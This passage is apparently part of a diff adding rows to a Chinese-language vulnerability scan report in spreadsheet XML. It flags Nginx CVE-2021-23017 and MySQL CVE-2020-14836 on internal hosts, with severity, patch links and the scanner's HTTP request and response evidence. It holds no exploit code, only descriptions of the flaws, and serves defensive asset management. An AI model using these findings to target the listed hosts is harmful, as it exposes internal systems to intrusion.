+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X26" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y26" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="27">
+      <c r="A27" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B27" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C27" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D27" t="inlineStr"/>
+      <c r="E27" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F27" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G27" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H27" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I27" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J27" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K27" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L27" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="M27" t="inlineStr">
+        <is>
+          <t>192.168.50.190</t>
+        </is>
+      </c>
+      <c r="N27" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O27" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P27" t="inlineStr"/>
+      <c r="Q27" t="inlineStr"/>
+      <c r="R27" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S27" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T27" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U27" t="inlineStr"/>
+      <c r="V27" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W27" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X27" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y27" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="28">
+      <c r="A28" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B28" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C28" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D28" t="inlineStr"/>
+      <c r="E28" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F28" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G28" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H28" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I28" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J28" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K28" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L28" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="M28" t="inlineStr">
+        <is>
+          <t>192.168.50.76</t>
+        </is>
+      </c>
+      <c r="N28" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O28" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P28" t="inlineStr"/>
+      <c r="Q28" t="inlineStr"/>
+      <c r="R28" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S28" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T28" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U28" t="inlineStr"/>
+      <c r="V28" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W28" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X28" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y28" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="29">
+      <c r="A29" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B29" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C29" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D29" t="inlineStr"/>
+      <c r="E29" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F29" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G29" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H29" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I29" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J29" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K29" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L29" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="M29" t="inlineStr">
+        <is>
+          <t>192.168.50.76</t>
+        </is>
+      </c>
+      <c r="N29" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O29" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P29" t="inlineStr"/>
+      <c r="Q29" t="inlineStr"/>
+      <c r="R29" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S29" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T29" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U29" t="inlineStr"/>
+      <c r="V29" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W29" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X29" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y29" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="30">
+      <c r="A30" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B30" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C30" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D30" t="inlineStr"/>
+      <c r="E30" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F30" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G30" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H30" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I30" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J30" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K30" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L30" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M30" t="inlineStr">
+        <is>
+          <t>192.168.54.100</t>
+        </is>
+      </c>
+      <c r="N30" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O30" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P30" t="inlineStr"/>
+      <c r="Q30" t="inlineStr"/>
+      <c r="R30" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S30" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T30" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U30" t="inlineStr"/>
+      <c r="V30" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W30" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X30" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y30" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="31">
+      <c r="A31" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B31" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C31" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr"/>
+      <c r="E31" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F31" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G31" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H31" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I31" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J31" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K31" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L31" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M31" t="inlineStr">
+        <is>
+          <t>192.168.54.100</t>
